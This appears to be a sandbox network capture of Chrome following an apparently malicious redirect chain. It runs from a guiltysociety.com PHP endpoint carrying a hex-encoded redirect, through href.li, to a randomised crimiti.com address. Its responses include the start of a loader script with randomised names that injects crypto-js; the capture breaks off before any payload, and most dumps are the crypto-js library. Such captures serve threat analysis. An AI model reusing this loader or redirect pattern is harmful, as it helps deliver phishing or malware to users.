                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:31 UTC196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:30 GMT
                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                                                                      2024-08-21 18:28:31 UTC2032INData Raw: 37 65 34 0d 0a 20 20 20 20 76 61 72 20 74 51 51 51 42 63 71 45 61 6d 79 42 47 6d 4b 69 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 74 51 51 51 42 63 71 45 61 6d 79 42 47 6d 4b 69 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 74 51 51 51 42 63 71 45 61 6d 79 42 47 6d 4b 69 29 3b 0d 0a 74 51 51 51 42 63 71 45 61 6d 79 42 47 6d 4b 69 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                                                                      Data Ascii: 7e4 var tQQQBcqEamyBGmKi = document.createElement("script");tQQQBcqEamyBGmKi.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(tQQQBcqEamyBGmKi);tQQQBcqEamyBGmKi.onload=function()


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      1192.168.2.549711104.17.25.144432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:31 UTC526OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                                                                      Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:31 UTC956INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:31 GMT
                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                                                      ETag: W/"5eb03e2d-bb78"
                                                                                                                                                                                                                                                                      Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                                                                                                                                                                      cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Age: 596861
                                                                                                                                                                                                                                                                      Expires: Mon, 11 Aug 2025 18:28:31 GMT
                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n6drcOORnSSZ%2Fq3LtAkv%2Bx0Bz5FlpVwgE7JV1AIZ61DJCLZfZPOMmDxec82hFSphlNpXg5iMaHnvddOpO6X8FSnwVL1TVj4HEY4Lc5LZc96pT4PJdKnULfppBQOBuW72qmWSJ80S"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                      CF-RAY: 8b6caef1dc8b80dc-EWR
                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:31 UTC413INData Raw: 37 62 66 35 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                                                                                                                                                                                                      Data Ascii: 7bf5!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                                                                                                                                                                                                      2024-08-21 18:28:31 UTC1369INData Raw: 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e
                                                                                                                                                                                                                                                                      Data Ascii: ndow.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.
                                                                                                                                                                                                                                                                      2024-08-21 18:28:31 UTC1369INData Raw: 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                                                      Data Ascii: <n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function
                                                                                                                                                                                                                                                                      2024-08-21 18:28:31 UTC1369INData Raw: 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42
                                                                                                                                                                                                                                                                      Data Ascii: ,this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessB
                                                                                                                                                                                                                                                                      2024-08-21 18:28:31 UTC1369INData Raw: 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31 3a 30
                                                                                                                                                                                                                                                                      Data Ascii: ?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1:0
                                                                                                                                                                                                                                                                      2024-08-21 18:28:31 UTC1369INData Raw: 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28
                                                                                                                                                                                                                                                                      Data Ascii: ]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+((
                                                                                                                                                                                                                                                                      2024-08-21 18:28:31 UTC1369INData Raw: 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32 39 36
                                                                                                                                                                                                                                                                      Data Ascii: *2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294967296
                                                                                                                                                                                                                                                                      2024-08-21 18:28:31 UTC1369INData Raw: 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d 3d 43
                                                                                                                                                                                                                                                                      Data Ascii: m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m=C
                                                                                                                                                                                                                                                                      2024-08-21 18:28:31 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63
                                                                                                                                                                                                                                                                      Data Ascii: call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o|c
                                                                                                                                                                                                                                                                      2024-08-21 18:28:31 UTC1369INData Raw: 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29 2c 42
                                                                                                                                                                                                                                                                      Data Ascii: tion(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5))),B


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      2192.168.2.54971269.49.245.1724432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:31 UTC466OUTGET /sass/res444.php?2-68747470733a2f2f687265662e6c692f3f68747470733a2f2f37435a68382e6372696d6974692e636f6d2f336171792f-abyssinian HTTP/1.1
                                                                                                                                                                                                                                                                      Host: guiltysociety.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:31 UTC196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:30 GMT
                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                                                                      2024-08-21 18:28:31 UTC2036INData Raw: 37 65 38 0d 0a 20 20 20 20 76 61 72 20 42 65 6e 66 63 45 67 4b 73 48 65 77 63 74 56 79 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 42 65 6e 66 63 45 67 4b 73 48 65 77 63 74 56 79 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 42 65 6e 66 63 45 67 4b 73 48 65 77 63 74 56 79 29 3b 0d 0a 42 65 6e 66 63 45 67 4b 73 48 65 77 63 74 56 79 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                                                                      Data Ascii: 7e8 var BenfcEgKsHewctVy = document.createElement("script");BenfcEgKsHewctVy.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(BenfcEgKsHewctVy);BenfcEgKsHewctVy.onload=function()


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      3192.168.2.549715192.0.78.274432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:34 UTC668OUTGET /?https://7CZh8.crimiti.com/3aqy/ HTTP/1.1
                                                                                                                                                                                                                                                                      Host: href.li
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:34 UTC279INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:34 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      X-ac: 2.jfk _dfw MISS
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
